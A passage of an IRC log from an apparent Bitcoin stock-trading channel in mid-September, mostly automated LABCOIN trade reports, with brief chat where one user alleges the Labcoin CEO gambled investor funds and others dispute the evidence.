@ 0.003077 = 0.3046 BTC [+] Sep 14 05:16:19 [BTCTC] [LABCOIN] 500 @ 0.003087 = 1.5435 BTC [+] Sep 14 05:16:20 [BTCTC] [LABCOIN] 3254 @ 0.003088 = 10.0484 BTC [+] Sep 14 05:16:21 [BTCTC] [LABCOIN] 2000 @ 0.003099 = 6.198 BTC [+] Sep 14 05:16:22 [BTCTC] [LABCOIN] 200 @ 0.0031 = 0.62 BTC [+] Sep 14 05:16:22 [BTCTC] [LABCOIN] 1981 @ 0.0031 = 6.1411 BTC [+] Sep 14 05:17:09 [BTCTC] [LABCOIN] 359 @ 0.002854 = 1.0246 BTC [-] Sep 14 05:17:10 [BTCTC] [LABCOIN] 1641 @ 0.002852 = 4.6801 BTC [-] Sep 14 05:17:23 [BTCTC] [LABCOIN] 100 @ 0.00298 = 0.298 BTC [+] Sep 14 05:17:24 [BTCTC] [LABCOIN] 345 @ 0.003005 = 1.0367 BTC [+] Sep 14 05:17:25 [BTCTC] [LABCOIN] 100 @ 0.00303 = 0.303 BTC [+] Sep 14 05:17:27 [BTCTC] [LABCOIN] 97 @ 0.003053 = 0.2961 BTC [+] Sep 14 05:17:37 [BTCTC] [LABCOIN] 345 @ 0.003053 = 1.0533 BTC [+] Sep 14 05:17:39 [BTCTC] [LABCOIN] 345 @ 0.003053 = 1.0533 BTC [+] Sep 14 05:17:41 [BTCTC] [LABCOIN] 359 @ 0.003053 = 1.096 BTC [+] Sep 14 05:17:55 [BTCTC] [LABCOIN] 30 @ 0.003053 = 0.0916 BTC [+] Sep 14 05:17:58 ?? coconut? Sep 14 05:18:04 [BTCTC] [LABCOIN] 200 @ 0.003053 = 0.6106 BTC [+] Sep 14 05:18:16 probably limbaugh, dude is shameless hehe Sep 14 05:18:16 [BTCTC] [LABCOIN] 200 @ 0.003053 = 0.6106 BTC [+] Sep 14 05:18:27 [BTCTC] [LABCOIN] 1013 @ 0.003053 = 3.0927 BTC [+] Sep 14 05:18:38 yes dexX7 Sep 14 05:21:03 labcoin CEO gambling investors funds on JD < please elaborate :p Sep 14 05:22:35 he is user ID 13839 Sep 14 05:23:17 proot? Sep 14 05:23:23 proof even Sep 14 05:23:51 [BTCTC] [LABCOIN] 5 @ 0.002997 = 0.015 BTC [-] Sep 14 05:23:52 [BTCTC] [LABCOIN] 162 @ 0.002998 = 0.4857 BTC [+] Sep 14 05:24:20 [BTCTC] [LABCOIN] 403 @ 0.0029 = 1.1687 BTC [-] Sep 14 05:24:33 [BTCTC] [LABCOIN] 134 @ 0.0029 = 0.3886 BTC [-] Sep 14 05:24:35 [BTCTC] [LABCOIN] 5 @ 0.002998 = 0.015 BTC [+] Sep 14 05:24:36 [BTCTC] [LABCOIN] 366 @ 0.002999 = 1.0976 BTC [+] Sep 14 05:24:42 Duffer1: wait i am getting it Sep 14 05:24:43 http://i.imgur.com/JGj5TBR.png Sep 14 05:24:59 [BTCTC] [LABCOIN] 145 @ 0.002997 = 0.4346 BTC [-] Sep 14 05:25:00 [BTCTC] [LABCOIN] 134 @ 0.002999 = 0.4019 BTC [+] Sep 14 05:25:01 [BTCTC] [LABCOIN] 367 @ 0.002999 = 1.1006 BTC [+] Sep 14 05:25:02 [BTCTC] [LABCOIN] 1261 @ 0.003 = 3.783 BTC [+] Sep 14 05:25:10 how is that proof? Sep 14 05:25:13 wait Sep 14 05:25:28 [BTCTC] [LABCOIN] 134 @ 0.002999 = 0.4019 BTC [-] Sep 14 05:25:32 its a chart, what more do you want Sep 14 05:25:41 hehe Sep 14 05:25:42 proof labcoin is a scam Sep 14 05:25:44 fuck wait Sep 14 05:25:51 original betting: https://just-dice.com/roll/23076412 Sep 14 05:25:52 [BTCTC] [LABCOIN] 55 @ 0.002998 = 0.1649 BTC [-] Sep 14 05:26:18 more recent betting Sep 14 05:26:19 https://just-dice.com/roll/67767895 Sep 14 05:27:09 i see that u13839 bets on jd, but where is the reference to lab? Sep 14 05:27:19 this id is balotelli Sep 14 05:27:27 [BTCTC] [LABCOIN] 1 @ 0.00303 BTC [+] Sep 14 05:27:28 [BTCTC] [LABCOIN] 177 @ 0.002885 = 0.5106 BTC [-] Sep 14 05:27:31 who started dramatically changing tactic and betting 100BTC+ Sep 14 05:27:36 few days after funds collected Sep 14 05:28:06 blockchain of 'tepapa' which is known nick of labcoin ceo send funds to this address Sep 14 05:28:34 [HAVELOCK] [AM100] 4 @ 0.02014 = 0.0806 BTC [-] Sep 14 05:28:46 [BTCTC] [LABCOIN] 50 @ 0.002886 = 0.1443 BTC [+] Sep 14 05:28:48 [BTCTC] [LABCOIN] 346 @ 0.002885 = 0.9982 BTC [-] Sep 14 05:28:49 [BTCTC] [LABCOIN] 5 @ 0.002884 = 0.0144 BTC [-] Sep 14 05:28:50 [BTCTC] [LABCOIN] 150 @ 0.002883 = 0.4325 BTC [-] Sep 14 05:28:51 [BTCTC] [LABCOIN] 55 @ 0.002858 = 0.1572 BTC [-] Sep 14 05:28:52 [BTCTC] [LABCOIN] 50 @ 0.002857 = 0.1429 BTC [-] Sep 14 05:28:53 [BTCTC] [LABCOIN] 438 @ 0.002855 = 1.2505 BTC [-] Sep 14 05:29:23 i don't think that even meets the circumstantial level Sep 14 05:29:26 "known nick". i didn't know this and neither does the btctalk search engine. Sep 14 05:29:53 just because you don't, doesn't make it not true Sep 14 05:29:56 but i'm completly not involved in this gaming stuff, so it might be public knowledge in the chats there Sep 14 05:30:27 theswede is in fact a gamble guy Sep 14 05:31:06 [BTCTC] [LABCOIN] 501 @ 0.002858 = 1.4319 BTC [+] Sep 14 05:37:31 I'm so sick of the fucking swede Sep 14 05:37:32 [BTCTC] [LABCOIN] 10 @ 0.002897 = 0.029 BTC [+] Sep 14 05:37:34 the fucking swede this Sep 14 05:37:37 the fucking swede that Sep 14 05:39:23 theswede is the fucking man Sep 14 05:39:48 making all these insider moves, stacking mad btc Sep 14 05:39:59 [BTCTC] [ACTIVEMINING] 432 @ 0.003027 = 1.3077 BTC [+] Sep 14 05:40:00 [BTCTC] [ACTIVEMINING] 61 @ 0.00303 = 0.1848 BTC [+] Sep 14 05:40:01 [BTCTC] [ACTIVEMINING] 327 @ 0.00304 = 0.9941 BTC [+] Sep 14 05:40:55 [BTCTC] [BTC-GROWTH] 20 @ 0.1008 = 2.016 BTC [+] Sep 14 05:40:57 [BTCTC] [BTC-GROWTH] 2 @ 0.1009 = 0.2018 BTC [+] Sep 14 05:40:58 [BTCTC] [BTC-GROWTH] 52 @ 0.101 = 5.252 BTC [+] Sep 14 05:52:13 anyone know the limits on withdrawal at bitstamp.net? Sep 14 05:52:20 listed no where on their site Sep 14 05:57:27 [MPEX] [S.MPOE] 1208 @ 0.00090342 = 1.0913 BTC [+] Sep 14 05:57:28 [MPEX] [S.MPOE] 8921 @ 0.00090347 = 8.0599 BTC [+] Sep 14 05:57:42 [MPEX] [S.MPOE] 7350 @ 0.00090454 = 6.6484 BTC [+] Sep 14 05:57:43 [MPEX] [S.MPOE] 6850 @ 0.00090553 = 6.2029 BTC [+] Sep 14 05:57:56 [MPEX] [S.MPOE] 3550 @ 0.00090568 = 3.2152 BTC [+] Sep 14 05:57:58 [MPEX] [S.MPOE] 1566 @ 0.0009086 = 1.4229 BTC [+] Sep 14 05:59:22 [BTCTC] [LABCOIN] 200 @ 0.002862 = 0.5724 BTC [-] Sep 14 05:59:38 [BTCTC] [DMS.MINING] 1 @ 0.002607 BTC [-] Sep 14 06:00:45 [BTCTC] [DMS.MINING] 14 @ 0.002602 = 0.0364 BTC [-] Sep 14 06:01:49 [BTCTC] [BASIC-MINING] 1 @ 0.127 BTC [+] Sep 14 06:02:35 [HAVELOCK] [LABCO] 2 @ 0.003 = 0.006 BTC [-] Sep 14 06:02:37 [HAVELOCK] [LABCO] 31 @ 0.003 = 0.093 BTC [-] Sep 14 06:04:14 [BTCTC] [LABCOIN] 200 @ 0.002861 = 0.5722 BTC [-] Sep 14 06:04:15 [BTCTC] [LABCOIN] 85 @ 0.00286 = 0.2431 BTC [-] Sep 14 06:08:43 [BTCTC] [KENILWORTH] 1 @ 0.001681 BTC [-] Sep 14 06:09:29 [BTCTC] [ACTIVEMINING] 800 @ 0.003024 = 2.4192 BTC [-] Sep 14 06:10:07 [BTCTC] [LABCOIN] 25 @ 0.00286 = 0.0715 BTC [-] Sep 14 06:10:33 [BTCTC] [ACTIVEMINING] 10 @ 0.003036 = 0.0304 BTC [+] Sep 14 06:10:35 [BTCTC] [ACTIVEMINING] 45 @ 0.00304 = 0.1368 BTC [+] Sep 14 06:11:16 [BTCTC] [LABCOIN] 13 @ 0.00286 = 0.0372 BTC [-] Sep 14 06:11:17 [BTCTC] [LABCOIN] 200 @ 0.002859 = 0.5718 BTC [-] Sep 14 06:11:19 [BTCTC] [LABCOIN] 359 @ 0.002852 = 1.0239 BTC [-] Sep 14 06:11:19 [BTCTC] [LABCOIN] 423 @ 0.002825 = 1.195 BTC [-] Sep 14 06:11:20 [BTCTC] [LABCOIN] 2005 @ 0.00282 = 5.6541 BTC [-] Sep 14 06:14:01 [BTCTC] [LABCOIN] 439 @ 0.00286 = 1.2555 BTC [+] Sep 14 06:16:45 [HAVELOCK] [XBOND] 200 @ 0.001186 = 0.2372 BTC [-] Sep 14 06:16:48 [HAVELOCK] [XBOND] 1050 @ 0.001187 = 1.2464 BTC [+] Sep 14 06:16:55 [BTCTC] [LABCOIN] 4 @ 0.002879 = 0.0115 BTC [+] Sep 14 06:17:47 [BTCTC] [LABCOIN] 200 @ 0.00288 = 0.576 BTC [+] Sep 14 06:18:32 [BTCTC] [LABCOIN] 1561 @ 0.00286 = 4.4645 BTC [-] Sep 14 06:18:34 [BTCTC] [LABCOIN] 423 @ 0.002822 = 1.1937 BTC [-] Sep 14 06:18:35 [BTCTC] [LABCOIN] 1695 @ 0.00282 = 4.7799 BTC [-] Sep 14 06:18:36 [BTCTC] [LABCOIN] 1000 @ 0.002812 = 2.812 BTC [-] Sep 14 06:18:37 [BTCTC] [LABCOIN] 10 @ 0.00281 = 0.0281 BTC [-] Sep 14 06:18:38 [BTCTC] [LABCOIN] 460 @ 0.002809 = 1.2921 BTC [-] Sep 14 06:18:39 [BTCTC] [LABCOIN] 660 @ 0.002803 = 1.85 BTC [-] Sep 14 06:18:40 [BTCTC] [LABCOIN] 191 @ 0.002801 = 0.535 BTC [-] Sep 14 06:20:01 [BTCTC] [LABCOIN] 375 @ 0.002803 = 1.0511 BTC [+] Sep 14 06:20:03 [BTCTC] [LABCOIN] 639 @ 0.002801 = 1.7898 BTC [-] Sep 14 06:20:04 [BTCTC] [LABCOIN] 1000 @ 0.0028 = 2.8 BTC [-] Sep 14 06:20:05 [BTCTC] [LABCOIN] 500 @ 0.0028 = 1.4 BTC [-] Sep 14 06:20:07 [BTCTC] [LABCOIN] 9 @ 0.002763 = 0.0249 BTC [-] Sep 14 06:20:09 [BTCTC] [LABCOIN] 95 @ 0.002762 = 0.2624 BTC [-] Sep 14 06:20:09 [BTCTC] [LABCOIN] 9 @ 0.002741 = 0.0247 BTC [-] Sep 14 06:20:10 [BTCTC] [LABCOIN] 99 @ 0.00274 = 0.2713 BTC [-] Sep 14 06:20:10 [BTCTC] [LABCOIN] 60 @ 0.002728 = 0.1637 BTC [-] Sep 14 06:20:11 [BTCTC] [LABCOIN] 603 @ 0.002727 = 1.6444 BTC [-] Sep 14 06:20:12 [BTCTC] [LABCOIN] 9 @ 0.002719 = 0.0245 BTC [-] Sep 14 06:20:14 [BTCTC] [LABCOIN] 97 @ 0.002718 = 0.2636 BTC [-] Sep 14 06:20:15 [BTCTC] [LABCOIN] 13 @ 0.002711 = 0.0352 BTC [-] Sep 14 06:20:16 [BTCTC] [LABCOIN] 105 @ 0.00271 = 0.2846 BTC [-] Sep 14 06:20:17 [BTCTC] [LABCOIN] 30 @ 0.00271 = 0.0813 BTC [-] Sep 14 06:20:18 [BTCTC] [LABCOIN] 410 @ 0.002707 = 1.1099 BTC [-] Sep 14 06:20:19 [BTCTC] [LABCOIN] 600 @ 0.002706 = 1.6236 BTC [-] Sep 14 06:20:20 [BTCTC] [LABCOIN] 3500 @ 0.002705 = 9.4675 BTC [-] Sep 14 06:20:20 [BTCTC] [LABCOIN] 500 @ 0.002701 = 1.3505 BTC [-] Sep 14 06:20:21 [BTCTC] [LABCOIN] 5000 @ 0.0027 = 13.5 BTC [-] Sep 14 06:20:23 [BTCTC] [LABCOIN] 9 @ 0.002697 = 0.0243 BTC [-] Sep 14 06:20:37 [BTCTC] [LABCOIN] 96 @ 0.002696 = 0.2588 BTC [-] Sep 14 06:20:38 [BTCTC] [LABCOIN] 9 @ 0.002675 = 0.0241 BTC [-] Sep 14 06:20:40 [BTCTC] [LABCOIN] 97 @ 0.002674 = 0.2594 BTC [-] Sep 14 06:20:53 [BTCTC] [LABCOIN] 9 @ 0.002653 = 0.0239 BTC [-] Sep 14 06:20:56 [BTCTC] [LABCOIN] 95 @ 0.002652 = 0.2519 BTC [-] Sep 14 06:20:58 [BTCTC] [LABCOIN] 9 @ 0.002631 = 0.0237 BTC [-] Sep 14 06:20:59 [BTCTC] [LABCOIN] 99 @ 0.00263 = 0.2604 BTC [-] Sep 14 06:20:59 down down down Sep 14 06:20:59 [BTCTC] [LABCOIN] 516 @ 0.002621 = 1.3524 BTC [-] Sep 14 06:21:00 [BTCTC] [LABCOIN] 5163 @ 0.00262 = 13.5271 BTC [-] Sep 14 06:21:01 [BTCTC] [LABCOIN] 19 @ 0.002609 = 0.0496 BTC [-] Sep 14 06:21:02 [BTCTC] [LABCOIN] 100 @ 0.002608 = 0.2608 BTC [-] Sep 14 06:21:03 [BTCTC] [LABCOIN] 97 @ 0.002608 = 0.253 BTC [-] Sep 14 06:21:04 [BTCTC] [LABCOIN] 318 @ 0.002607 = 0.829 BTC [-] Sep 14 06:21:05 [BTCTC] [LABCOIN] 4100 @ 0.002606 = 10.6846 BTC [-] Sep 14 06:21:06 [BTCTC] [LABCOIN] 611 @ 0.002605 = 1.5917 BTC [-] Sep 14 06:22:17 [BTCTC] [LABCOIN] 251 @ 0.002607 = 0.6544 BTC [+] Sep 14 06:22:20 [BTCTC] [LABCOIN] 99 @ 0.002607 = 0.2581 BTC [+] Sep 14 06:22:21 [BTCTC] [LABCOIN] 1650 @ 0.002605 = 4.2983 BTC [-] Sep 14 06:23:18 [BTCTC] [LABCOIN] 5 @ 0.002608 = 0.013 BTC [+] Sep 14 06:23:18 [BTCTC] [LABCOIN] 195 @ 0.002607 = 0.5084 BTC [-] Sep 14 06:23:20 [BTCTC] [LABCOIN] 1800 @ 0.002605 = 4.689 BTC [-] Sep 14 06:23:37 [BTCTC] [LABCOIN] 2439 @ 0.002605 = 6.3536 BTC [-] Sep 14 06:23:39 [BTCTC] [LABCOIN] 4400 @ 0.002602 = 11.4488 BTC [-] Sep 14 06:23:54 [BTCTC] [LABCOIN] 200 @ 0.002601 = 0.5202 BTC [-] Sep 14 06:24:03 [BTCTC] [LABCOIN] 200 @ 0.002601 = 0.5202 BTC [-] Sep 14 06:24:24 [BTCTC] [LABCOIN] 200 @ 0.002601 = 0.5202 BTC [-] Sep 14 06:24:34 [BTCTC] [LABCOIN] 200 @ 0.002601 = 0.5202 BTC [-] Sep 14 06:25:19 [HAVELOCK] [LABCO] 179 @ 0.003 = 0.537 BTC [-] Sep 14 06:25:48 [BTCTC] [ACTIVEMINING] 10 @ 0.002951 = 0.0295 BTC [-] Sep 14 06:25:51 [BTCTC] [LABCOIN] 2000 @ 0.002553 = 5.106 BTC [-] Sep 14 06:25:54 [BTCTC] [LABCOIN] 3000 @ 0.002553 = 7.659 BTC [-] Sep 14 06:26:22 [BTCTC] [LABCOIN] 1000 @ 0.002553 = 2.553 BTC [-] Sep 14 06:26:32 [BTCTC] [ACTIVEMINING] 555 @ 0.00295 = 1.6373 BTC [-] Sep 14 06:26:45 [BTCTC] [LABCOIN] 1 @ 0.002553 BTC [-] Sep 14 06:27:01 [BTCTC] [LABCOIN] 7 @ 0.002553 = 0.0179 BTC [-] Sep 14 06:27:21 [BTCTC] [LABCOIN] 500 @ 0.002553 = 1.2765 BTC [-] Sep 14 06:27:42 [BTCTC] [ASICMINER-PT] 1 @ 2.194 BTC [+] Sep 14 06:27:45 [BTCTC] [LABCOIN] 350 @ 0.002553 = 0.8936 BTC [-] Sep 14 06:27:49 [BTCTC] [LABCOIN] 71 @ 0.002552 = 0.1812 BTC [-] Sep 14 06:27:58 [BTCTC] [LABCOIN] 1 @ 0.002553 BTC [+] Sep 14 06:28:02 [BTCTC] [LABCOIN] 3 @ 0.002553 = 0.0077 BTC [+] Sep 14 06:28:03 [BTCTC] [ASICMINER-PT] 2 @ 2.194 = 4.388 BTC [+] Sep 14 06:28:14 [BTCTC] [LABCOIN] 138 @ 0.002553 = 0.3523 BTC [+] Sep 14 06:29:10 [BTCTC] [ASICMINER-PT] 1 @ 2.194 BTC [+] Sep 14 06:29:22 [BTCTC] [LABCOIN] 100 @ 0.002555 = 0.2555 BTC [+] Sep 14 06:29:42 [BTCTC] [ACTIVEMINING] 10 @ 0.002951 = 0.0295 BTC [+] Sep 14 06:29:44 [BTCTC] [ACTIVEMINING] 425 @ 0.00295 = 1.2538 BTC [-] Sep 14 06:30:04 [BTCTC] [LABCOIN] 50 @ 0.002556 = 0.1278 BTC [+] Sep 14 06:31:26 [BTCTC] [LABCOIN] 440 @ 0.002556 = 1.1246 BTC [+] Sep 14 06:31:38 [BTCTC] [LABCOIN] 500 @ 0.002555 = 1.2775 BTC [-] Sep 14 06:31:48 [BTCTC] [LABCOIN] 626 @ 0.002552 = 1.5976 BTC [-] Sep 14 06:32:47 [BTCTC] [LABCOIN] 130 @ 0.002554 = 0.332 BTC [+] Sep 14 06:33:08 [BTCTC] [LABCOIN] 234 @ 0.002554 = 0.5976 BTC [+] Sep 14 06:36:12 [BTCTC] [FIMB] 160 @ 0.01099 = 1.7584 BTC [+] Sep 14 06:38:34 [BTCTC] [BTC-BOND] 105 @ 0.01 = 1.05 BTC [+] Sep 14 06:38:57 [BTCTC] [LABCOIN] 1 @ 0.002552 BTC [-] Sep 14 06:40:30 [BTCTC] [LABCOIN] 1 @ 0.002734 BTC [+] Sep 14 06:41:54 [BTCTC] [LABCOIN] 1 @ 0.002733 BTC [-] Sep 14 06:44:09 [BTCTC] [LABCOIN] 30 @ 0.002611 = 0.0783 BTC [-] Sep 14 06:44:11 [BTCTC] [LABCOIN] 1000 @ 0.002558 = 2.558 BTC [-] Sep 14 06:44:12 [BTCTC] [LABCOIN] 149 @ 0.002557 = 0.381 BTC [-] Sep 14 06:44:13 [BTCTC] [LABCOIN] 30 @ 0.002556 = 0.0767 BTC [-] Sep 14 06:44:14 [BTCTC] [LABCOIN] 469 @ 0.002556 = 1.1988 BTC [-] Sep 14 06:44:16 [BTCTC] [LABCOIN] 320 @ 0.002553 = 0.817 BTC [-] Sep 14 06:44:16 [BTCTC] [LABCOIN] 3202 @ 0.002552 = 8.1715 BTC [-] Sep 14 06:44:17 [BTCTC] [LABCOIN] 56 @ 0.002544 = 0.1425 BTC [-] Sep 14 06:44:18 [BTCTC] [LABCOIN] 563 @ 0.002543 = 1.4317 BTC [-] Sep 14 06:44:19 [BTCTC] [LABCOIN] 221 @ 0.002516 = 0.556 BTC [-] Sep 14 06:44:20 [BTCTC] [LABCOIN] 960 @ 0.002515 = 2.4144 BTC [-] Sep 14 06:45:22 [BTCTC] [LABCOIN] 20 @ 0.002557 = 0.0511 BTC [+] Sep 14 06:45:29 [BTCTC] [LABCOIN] 2566 @ 0.002515 = 6.4535 BTC [-] Sep 14 06:45:37 [BTCTC] [LABCOIN] 887 @ 0.002507 = 2.2237 BTC [-] Sep 14 06:45:40 [BTCTC] [LABCOIN] 99 @ 0.002507 = 0.2482 BTC [-] Sep 14 06:45:45 [BTCTC] [LABCOIN] 728 @ 0.0025 = 1.82 BTC [-] Sep 14 06:50:35 [BTCTC] [ACTIVEMINING] 8 @ 0.003039 = 0.0243 BTC [+] Sep 14 06:50:37 [BTCTC] [ACTIVEMINING] 502 @ 0.00304 = 1.5261 BTC [+] Sep 14 06:53:22 #activemining Sep 14 06:55:16 TheSeven, are you still involved/consulting in Labcoins 65nm development? Sep 14 06:58:45 bobbabad:no disregard that news Sep 14 06:58:54 you heard it here first folks Sep 14 06:59:20 Wait. Sep 14 06:59:22 lol Sep 14 06:59:22 Heard what? Sep 14 06:59:34 --- TheSevem is now known as coconut Sep 14 07:00:57 some bulgarian claiming to be TheSeven Sep 14 07:01:10 false prophet Sep 14 07:01:18 damn Sep 14 07:03:38 [BTCTC] [ACTIVEMINING] 10 @ 0.002951 = 0.0295 BTC [-] Sep 14 07:03:39 [BTCTC] [ACTIVEMINING] 20 @ 0.00295 = 0.059 BTC [-] Sep 14 07:03:41 [BTCTC] [ACTIVEMINING] 47 @ 0.002921 = 0.1373 BTC [-] Sep 14 07:03:41 [BTCTC] [ACTIVEMINING] 191 @ 0.00291 = 0.5558 BTC [-] Sep 14 07:03:42 [BTCTC] [ACTIVEMINING] 250 @ 0.002908 = 0.727 BTC [-] Sep 14 07:03:43 [BTCTC] [ACTIVEMINING] 82 @ 0.002907 = 0.2384 BTC [-] Sep 14 07:09:46 [BTCTC] [LABCOIN] 100 @ 0.00252 = 0.252 BTC [+] Sep 14 07:09:47 [BTCTC] [LABCOIN] 325 @ 0.00251 = 0.8158 BTC [-] Sep 14 07:09:48 [BTCTC] [LABCOIN] 72 @ 0.0025 = 0.18 BTC [-] Sep 14 07:09:50 [BTCTC] [LABCOIN] 76 @ 0.0025 = 0.19 BTC [-] Sep 14 07:09:51 [BTCTC] [LABCOIN] 600 @ 0.0025 = 1.5 BTC [-] Sep 14 07:09:52 [BTCTC] [LABCOIN] 1000 @ 0.002421 = 2.421 BTC [-] Sep 14 07:09:53 [BTCTC] [LABCOIN] 190 @ 0.00242 = 0.4598 BTC [-] Sep 14 07:09:54 [BTCTC] [LABCOIN] 30 @ 0.002411 = 0.0723 BTC [-] Sep 14 07:09:55 [BTCTC] [LABCOIN] 1000 @ 0.002411 = 2.411 BTC [-] Sep 14 07:09:55 [BTCTC] [LABCOIN] 400 @ 0.00241 = 0.964 BTC [-] Sep 14 07:09:56 [BTCTC] [LABCOIN] 2700 @ 0.002409 = 6.5043 BTC [-] Sep 14 07:09:58 [BTCTC] [LABCOIN] 4000 @ 0.002408 = 9.632 BTC [-] Sep 14 07:09:59 [BTCTC] [LABCOIN] 2000 @ 0.002408 = 4.816 BTC [-] Sep 14 07:10:00 [BTCTC] [LABCOIN] 10 @ 0.002366 = 0.0237 BTC [-] Sep 14 07:10:01 [BTCTC] [LABCOIN] 100 @ 0.002364 = 0.2364 BTC [-] Sep 14 07:10:02 [BTCTC] [LABCOIN] 1000 @ 0.00232 = 2.32 BTC [-] Sep 14 07:10:03 [BTCTC] [LABCOIN] 3980 @ 0.002318 = 9.2256 BTC [-] Sep 14 07:10:04 [BTCTC] [LABCOIN] 500 @ 0.002317 = 1.1585 BTC [-] Sep 14 07:10:05 [BTCTC] [LABCOIN] 3917 @ 0.002316 = 9.0718 BTC [-] Sep 14 07:12:53 [BTCTC] [LABCOIN] 400 @ 0.002319 = 0.9276 BTC [+] Sep 14 07:12:54 [BTCTC] [LABCOIN] 1083 @ 0.002316 = 2.5082 BTC [-] Sep 14 07:12:55 [BTCTC] [LABCOIN] 1000 @ 0.002311 = 2.311 BTC [-] Sep 14 07:12:56 [BTCTC] [LABCOIN] 30 @ 0.002311 = 0.0693 BTC [-] Sep 14 07:12:57 [BTCTC] [LABCOIN] 30 @ 0.002311 = 0.0693 BTC [-] Sep 14 07:12:59 [BTCTC] [LABCOIN] 1000 @ 0.00231 = 2.31 BTC [-] Sep 14 07:13:00 [BTCTC] [LABCOIN] 1 @ 0.00231 BTC [-] Sep 14 07:13:01 [BTCTC] [LABCOIN] 2000 @ 0.00231 = 4.62 BTC [-] Sep 14 07:13:02 [BTCTC] [LABCOIN] 1945 @ 0.00231 = 4.493 BTC [-] Sep 14 07:13:03 [BTCTC] [LABCOIN] 5000 @ 0.002309 = 11.545 BTC [-] Sep 14 07:13:04 [BTCTC] [LABCOIN] 10000 @ 0.002308 = 23.08 BTC [-] Sep 14 07:13:05 [BTCTC] [LABCOIN] 2500 @ 0.002304 = 5.76 BTC [-] Sep 14 07:13:06 [BTCTC] [LABCOIN] 1000 @ 0.0023 = 2.3 BTC [-] Sep 14 07:13:07 [BTCTC] [LABCOIN] 400 @ 0.0023 = 0.92 BTC [-] Sep 14 07:13:08 [BTCTC] [LABCOIN] 595 @ 0.002289 = 1.362 BTC [-] Sep 14 07:13:09 [BTCTC] [LABCOIN] 1500 @ 0.002288 = 3.432 BTC [-] Sep 14 07:13:10 [BTCTC] [LABCOIN] 2516 @ 0.002283 = 5.744 BTC [-] Sep 14 07:15:45 [BTCTC] [LABCOIN] 1 @ 0.002285 BTC [+] Sep 14 07:16:31 [HAVELOCK] [SDSTM] 1 @ 0.0025 BTC [-] Sep 14 07:18:01 [BTCTC] [ACTIVEMINING] 10 @ 0.002928 = 0.0293 BTC [+] Sep 14 07:18:03 [BTCTC] [ACTIVEMINING] 41 @ 0.002926 = 0.12 BTC [-] Sep 14 07:18:04 [BTCTC] [ACTIVEMINING] 167 @ 0.002925 = 0.4885 BTC [-] Sep 14 07:18:06 [BTCTC] [LABCOIN] 500 @ 0.0023 = 1.15 BTC [+] Sep 14 07:18:07 [BTCTC] [LABCOIN] 241 @ 0.002287 = 0.5512 BTC [-] Sep 14 07:18:16 [BTCTC] [ACTIVEMINING] 182 @ 0.002922 = 0.5318 BTC [-] Sep 14 07:18:17 [MPEX] [S.MPOE] 3600 @ 0.0009086 = 3.271 BTC [+] Sep 14 07:18:18 [BTCTC] [LABCOIN] 100 @ 0.0023 = 0.23 BTC [+] Sep 14 07:18:20 [BTCTC] [LABCOIN] 759 @ 0.002287 = 1.7358 BTC [-] Sep 14 07:18:21 [BTCTC] [LABCOIN] 67 @ 0.002285 = 0.1531 BTC [-] Sep 14 07:18:22 [BTCTC] [LABCOIN] 74 @ 0.002285 = 0.1691 BTC [-] Sep 14 07:18:56 ThickAsThieves http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 14 07:18:58 calculator nao. Sep 14 07:19:02 or who was asking for it ? Sep 14 07:19:05 [BTCTC] [LABCOIN] 100 @ 0.002285 = 0.2285 BTC [-] Sep 14 07:20:05 [BTCTC] [LABCOIN] 100 @ 0.00229 = 0.229 BTC [+] Sep 14 07:20:43 [BTCTC] [LABCOIN] 2 @ 0.002659 = 0.0053 BTC [+] Sep 14 07:21:39 [HAVELOCK] [CBTC] 1 @ 0.00042 BTC [+] Sep 14 07:22:27 [BTCTC] [LABCOIN] 1 @ 0.002598 BTC [-] Sep 14 07:23:49 [BTCTC] [LABCOIN] 5 @ 0.002597 = 0.013 BTC [-] Sep 14 07:23:51 [BTCTC] [LABCOIN] 40 @ 0.002597 = 0.1039 BTC [-] Sep 14 07:24:40 [BTCTC] [LABCOIN] 1 @ 0.002593 BTC [-] Sep 14 07:27:33 [MPEX] [S.MG] 25000 @ 0.0002001 = 5.0025 BTC [+] Sep 14 07:27:34 [MPEX] [S.MG] 7750 @ 0.0002 = 1.55 BTC [-] Sep 14 07:29:18 [BTCTC] [LABCOIN] 5 @ 0.002495 = 0.0125 BTC [-] Sep 14 07:29:21 wow what is happening with labcoin Sep 14 07:29:27 all weak hands Sep 14 07:29:47 [BTCTC] [LABCOIN] 746 @ 0.002496 = 1.862 BTC [+] Sep 14 07:30:05 [HAVELOCK] [LABCO] 65 @ 0.003 = 0.195 BTC [-] Sep 14 07:34:42 [BTCTC] [LABCOIN] 746 @ 0.002497 = 1.8628 BTC [+] Sep 14 07:34:43 [BTCTC] [LABCOIN] 357 @ 0.002499 = 0.8921 BTC [+] Sep 14 07:35:27 what the hell did you think was going to happen ? Sep 14 07:35:32 [BTCTC] [LABCOIN] 398 @ 0.002499 = 0.9946 BTC [+] Sep 14 07:36:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02051 = 0.041 BTC [+] Sep 14 07:36:33 unrelated : https://bitcointalk.org/index.php?topic=170332.msg3147804#msg3147804 Sep 14 07:39:15 [BTCTC] [LABCOIN] 4 @ 0.002537 = 0.0101 BTC [+] Sep 14 07:45:02 [BTCTC] [COGNITIVE] 4 @ 0.2666 = 1.0664 BTC [-] Sep 14 07:45:04 [BTCTC] [COGNITIVE] 11 @ 0.2664 = 2.9304 BTC [-] Sep 14 07:45:05 [BTCTC] [COGNITIVE] 2 @ 0.266 = 0.532 BTC [-] Sep 14 07:45:05 [BTCTC] [LABCOIN] 55 @ 0.00245 = 0.1348 BTC [-] Sep 14 07:45:49 [BTCTC] [LABCOIN] 60 @ 0.002528 = 0.1517 BTC [+] Sep 14 07:46:17 [BTCTC] [LABCOIN] 45 @ 0.002317 = 0.1043 BTC [-] Sep 14 07:46:18 [BTCTC] [LABCOIN] 5 @ 0.002316 = 0.0116 BTC [-] Sep 14 07:46:20 [BTCTC] [LABCOIN] 20 @ 0.002315 = 0.0463 BTC [-] Sep 14 07:46:21 [BTCTC] [LABCOIN] 117 @ 0.002315 = 0.2709 BTC [-] Sep 14 07:46:22 [BTCTC] [LABCOIN] 14 @ 0.002314 = 0.0324 BTC [-] Sep 14 07:46:23 [BTCTC] [LABCOIN] 29 @ 0.002313 = 0.0671 BTC [-] Sep 14 07:46:25 [BTCTC] [LABCOIN] 688 @ 0.002306 = 1.5865 BTC [-] Sep 14 07:46:26 [BTCTC] [LABCOIN] 20 @ 0.002305 = 0.0461 BTC [-] Sep 14 07:46:26 [BTCTC] [LABCOIN] 1728 @ 0.002305 = 